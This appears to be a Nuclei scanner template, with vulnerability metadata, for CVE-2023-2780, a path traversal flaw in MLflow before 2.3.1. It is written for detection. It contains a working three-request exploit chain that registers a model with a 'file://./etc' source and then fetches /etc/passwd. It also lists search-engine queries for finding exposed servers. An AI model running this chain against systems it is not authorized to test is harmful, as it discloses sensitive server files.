
Mlflow <2.3.1 - Local File Inclusion Bypass

2023-05-22 10:26:58
ProjectDiscovery

CVSS3: 9.8 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score: 9.5 High (Confidence: High)
EPSS: 0.03 Low (Percentile: 91.0%)

Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.3.1.
id: CVE-2023-2780

info:
  name: Mlflow <2.3.1 - Local File Inclusion Bypass
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.3.1.
  impact: |
    Successful exploitation could allow an attacker to read sensitive files on the server.
  remediation: |
    Upgrade Mlflow to version 2.3.1 or later to mitigate the vulnerability.
  reference:
    - https://huntr.dev/bounties/b12b0073-0bb0-4bd1-8fc2-ec7f17fd7689/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-2780
    - https://github.com/mlflow/mlflow/commit/fae77a525dd908c56d6204a4cef1c1c75b4e9857
    - https://github.com/Ostorlab/KEV
    - https://github.com/Ostorlab/known_exploited_vulnerbilities_detectors
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-2780
    cwe-id: CWE-29
    epss-score: 0.04145
    epss-percentile: 0.92175
    cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: lfprojects
    product: mlflow
    shodan-query: http.title:"mlflow"
    fofa-query:
      - title="mlflow"
      - app="mlflow"
    google-query: intitle:"mlflow"
  tags: cve2023,cve,mlflow,oss,lfi,huntr,intrusive,lfprojects

http:
  - raw:
      - |
        POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json; charset=utf-8

        {"name":"{{randstr}}"}
      - |
        POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json; charset=utf-8

        {"name":"{{randstr}}","source":"file://./etc"}
      - |
        GET /model-versions/get-artifact?path=passwd&name={{randstr}}&version={{version}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: version
        group: 1
        regex:
          - '"version": "([0-9.]+)",'
        internal: true
        part: body
# digest: 4a0a00473045022100803bd551a319393f56d5aae8e1a5f4b50669875f42dfffcf37671598462004d1022049f95322641e98ebee3e86be573642b94487e3b09e2ae104fbe8ac3fe71a2dac:922c64590222798bb761d5b6d8e72950
